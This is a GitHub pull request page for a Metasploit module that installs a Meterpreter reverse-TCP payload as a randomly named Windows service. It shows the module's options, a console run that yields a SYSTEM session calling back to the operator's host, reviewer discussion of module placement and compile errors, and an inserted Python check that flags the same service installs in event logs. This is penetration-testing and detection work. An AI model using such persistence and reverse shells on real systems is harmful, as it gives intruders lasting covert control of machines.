Add exploit module windows persistent service#10822

Closed
Green-m wants to merge 316 commits into
rapid7:masterfrom
Green-m:feature/win_service

Conversation

@Green-m Green-m commented Oct 17, 2018

Contributor

Note: This PR relies on #10821; please merge that before merging this. Could be merged now.

Resolves #10385

Verification steps

  • get session on target
  • use post/windows/manage/persistence_service
  • set payload <payload>
  • set lport <lport>
  • set lhost <lhost>
  • set handler true
  • run

Usage

msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/manage/persistence_service) > options

Module options (post/windows/manage/persistence_service):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  true                             no        Start an exploit/multi/handler to receive the connection
   LHOST    192.168.56.1                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        The payload to use in the service.
   SESSION  1                                yes       The session to run this module on.
msf5 post(windows/manage/persistence_service) > run

[*] Running module against TEST-PC
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\IDJkb.exe
[*] Creating service pWbPkeDm
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Post module execution completed
[*] Sending stage (179779 bytes) to 192.168.56.101
msf5 post(windows/manage/persistence_service) > [*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:50101) at 2018-10-17 18:37:51 +0800
msf5 post(windows/manage/persistence_service) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  test-PC\test @ TEST-PC         192.168.56.1:8888 -> 192.168.56.101:50098 (192.168.56.101)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ TEST-PC  192.168.56.1:4433 -> 192.168.56.101:50101 (192.168.56.101)

msf5 post(windows/manage/persistence_service) >

Enjoy it!
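For the defender side of the transcript above: the module drops a randomly named executable into the user's Temp directory and registers it as an auto-start service, which lands in the Windows System log as a Service Control Manager Event ID 7045 ("A service was installed in the system"). The following check is an added example, not code from this PR or from Metasploit; the three 7045 records are constructed (record 2 mirrors the IDJkb.exe / pWbPkeDm names from the transcript), and in practice the fields would come from an EVTX export or a SIEM.

```python
"""Flag Event ID 7045 records matching the persistence_service pattern:
a service binary under a Temp directory, random-looking names, auto start
as LocalSystem. Added example for this page, not code from the PR."""
import re
from typing import Dict, List

# Constructed 7045 EventData fields (ServiceName, ImagePath, StartType,
# AccountName). Records 1 and 3 are benign; record 2 mirrors the transcript.
SAMPLE_7045 = [
    {"ServiceName": "Dell Update Service",
     "ImagePath": r"C:\Program Files\Dell\UpdateService\dus.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "pWbPkeDm",
     "ImagePath": r"C:\Users\test\AppData\Local\Temp\IDJkb.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Sysmon64",
     "ImagePath": r"C:\Windows\Sysmon64.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

# Service image living under a per-user or system Temp directory.
TEMP_PATH = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
# Letters-only token of 5..16 chars, as produced by random-name generators.
LETTERS_ONLY = re.compile(r"^[A-Za-z]{5,16}$")


def looks_random(token: str) -> bool:
    """Letters only, and mixed case that is neither Capitalised nor ALLCAPS."""
    if not LETTERS_ONLY.match(token):
        return False
    return token != token.lower() and token != token.upper() and not token.istitle()


def score_7045(ev: Dict[str, str]) -> List[str]:
    """Return the indicators found in one record (empty list = not flagged)."""
    path = ev.get("ImagePath", "").strip('"')
    exe_stem = path.split("\\")[-1].rsplit(".", 1)[0]
    reasons = []
    if TEMP_PATH.search(path):
        reasons.append("image in a Temp directory")
    if looks_random(ev.get("ServiceName", "")):
        reasons.append("random-looking service name")
    if looks_random(exe_stem):
        reasons.append("random-looking binary name")
    # Auto start as LocalSystem is normal for legitimate services, so it only
    # counts as supporting evidence once a path or name indicator is present.
    if reasons and ev.get("StartType", "").lower().startswith("auto") \
            and ev.get("AccountName") == "LocalSystem":
        reasons.append("auto start as LocalSystem")
    return reasons


def find_suspicious(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each flagged ServiceName to the list of indicators that fired."""
    return {ev["ServiceName"]: r for ev in events if (r := score_7045(ev))}
```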

@h00die h00die left a comment

Contributor

All I had time to check this evening. I <3 that cleanup script!!!

Interesting idea (didn't review this far in the code): should it just print the rc location, or should it be saved somewhere? Loot doesn't feel right, but a screen can close or a log be lost. If this was databased somewhere it would be easier to find after, say, a 30 day engagement.

Green-m commented Oct 18, 2018

Contributor Author

Thanks for your review! @h00die!
The cleanup file location is actually a little obscure and not readable. Putting it into the database is a good idea! I will try this approach.
The doc error has been fixed.

@wchen-r7

Contributor

Would this be easier if the module was a windows/local exploit? You wouldn't have to worry about handler.

Green-m commented Oct 22, 2018

Contributor Author

@wchen-r7
Yes, that sounds good!
And a little question: what is the difference between modules in exploit/windows/local/* and post/windows/?

I see a lot of persistence modules; some are located in exploit/xx/local and others in post.

msf5 exploit(windows/local/wmi_persistence) > search persistence

Matching Modules
================

   Name                                               Disclosure Date  Rank       Check  Description
   ----                                               ---------------  ----       -----  -----------
   auxiliary/server/regsvr32_command_delivery_server                   normal     No     Regsvr32.exe (.sct) Command Delivery Server
   exploit/linux/local/autostart_persistence          2006-02-13       excellent  No     Autostart Desktop Item Persistence
   exploit/linux/local/cron_persistence               1979-07-01       excellent  No     Cron Persistence
   exploit/linux/local/rc_local_persistence           1980-10-01       excellent  No     rc.local Persistence
   exploit/linux/local/service_persistence            1983-01-01       excellent  No     Service Persistence
   exploit/osx/local/persistence                      2012-04-01       excellent  No     Mac OS X Persistent Payload Installer
   exploit/osx/local/sudo_password_bypass             2013-02-28       normal     Yes    Mac OS X Sudo Password Bypass
   exploit/unix/local/at_persistence                  1997-01-01       excellent  Yes    at(1) Persistence
   exploit/windows/local/persistence                  2011-10-19       excellent  No     Windows Persistent Registry Startup Payload Installer
   exploit/windows/local/ps_wmi_exec                  2012-08-19       excellent  No     Authenticated WMI Exec via Powershell
   exploit/windows/local/registry_persistence         2015-07-01       excellent  Yes    Windows Registry Only Persistence
   exploit/windows/local/s4u_persistence              2013-01-02       excellent  No     Windows Manage User Level Persistent Payload Installer
   exploit/windows/local/vss_persistence              2011-10-21       excellent  No     Persistent Payload in Windows Volume Shadow Copy
   exploit/windows/local/wmi_persistence              2017-06-06       normal     No     WMI Event Subscription Persistence
   exploit/windows/smb/psexec_psh                     1999-01-01       manual     No     Microsoft Windows Authenticated Powershell Command Execution
   post/linux/manage/sshkey_persistence                                excellent  No     SSH Key Persistence
   post/windows/gather/enum_ad_managedby_groups                        normal     No     Windows Gather Active Directory Managed Groups
   post/windows/manage/persistence_exe                                 normal     No     Windows Manage Persistent EXE Payload Installer

I am a little confused, for I thought all post-exploitation modules should be put in post. Has something changed, or am I wrong?

I joined the Metasploit team not long ago, forgive my ignorance.

timwr commented Oct 22, 2018

Contributor

I agree this should be an exploit module. In general if your module has a payload it should be an exploit module. If it uses a session but no payload it should be a post module. Neither is auxiliary.
Unfortunately I think the session upgrade (https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb) module is the edge case here but it should be refactored into an exploit.

timwr commented Oct 22, 2018

Contributor

@github is broken :trollface:

Green-m commented Oct 22, 2018

Contributor Author

Thanks @timwr for explaining.
I have moved it to exploit/windows/local. @wchen-r7

@Green-m Green-m changed the title Add post module windows persistent service Add exploit module windows persistent service Oct 23, 2018

@sempervictus sempervictus left a comment

Contributor

I think this is the most complete metasm SVC template I've seen. Awesome, thank you. Will test this weekend.

@jrobles-r7

Contributor

I'm getting an error when I run the module.

msf5 exploit(windows/local/persistence_service) > exploit 

[*] Running module against DESKTOP-IPOGIJR
[-] Exploit failed: Metasm::ParseError No such file or directory "sys/cdefs.h" near "include" at "</usr/include/features.h>" line 364,
	included from "</usr/include/string.h>" line 27,
	included from "\"<unk>\"" line 3

Are additional header files needed for this module?

@jrobles-r7

Contributor

After merging in master locally, I'm getting the following error

msf5 exploit(windows/local/persistence_service) > exploit

[*] Started reverse TCP handler on 172.22.222.136:5555 
[*] Running module against DESKTOP-IPOGIJR
[-] Exploit failed: Metasm::ParseError undefined variable near "_snprintf" at "\"<unk>\"" line 983
[*] Exploit completed, but no session was created.

@wchen-r7

Contributor

@jrobles-r7 So when I was merging #10821, I might have skipped snprintf for a reason. You might want to try a different function to achieve what snprintf needs... maybe. Let me know if you have trouble. Sorry about that.

Green-m commented Dec 13, 2018

Contributor Author

06e1d16

I found this commit; I removed it on account of the crash. I am not very sure how to achieve it, as I do not know how it crashed.

@jrobles-r7

Contributor

@Green-m I opened a new PR for these changes since merging in master caused the page to show lots of commits and files changed.

Development

Successfully merging this pull request may close these issues.

Create persistent service on windows